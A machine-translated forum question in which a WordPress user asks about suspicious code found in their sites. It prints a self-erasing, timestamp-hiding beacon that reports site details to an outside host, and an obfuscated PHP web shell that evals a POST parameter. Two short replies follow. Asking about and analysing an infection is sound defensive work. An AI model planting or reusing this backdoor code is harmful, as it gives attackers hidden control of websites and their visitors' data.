我刚刚注意到,我的一些wordpress项目在特定位置包含一些随机代码。这是wordpress病毒吗?
例如: WP-包括/ meta.php包含的以下文件代码底部:
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456732115){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}
另一个位置:WP-包括/ ID3/getid.php包括下面的代码:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
基本上,我所看到的是,check_meta()方法更新wp-includes/meta.php文件没有改变它的修改时间。然后,file_get_contents正在连接一些中国服务器,并通过一些数据通过$ _GET。
在第二个文件,str_rot13( 'riny')等于EVAL
有谁处理那样的问题之前?也许有人可以说更多关于这个代码。期待您的回音。就目前而言,我把它当作一种病毒,因为它已经蔓延到我的许多项目中。
我访问过'http://web.51.la:82',它打印出关于我的所有信息:ip地址,浏览器等等。它可能是一个跟踪访问类型的插件,我不确定为什么有人想收集有关您的访问者的信息。 – aron9forever
我认为如果你在WordPress开发栈交易http://wordpress.stackexchange.com/上发布信息,你可能会得到更好的回应。 –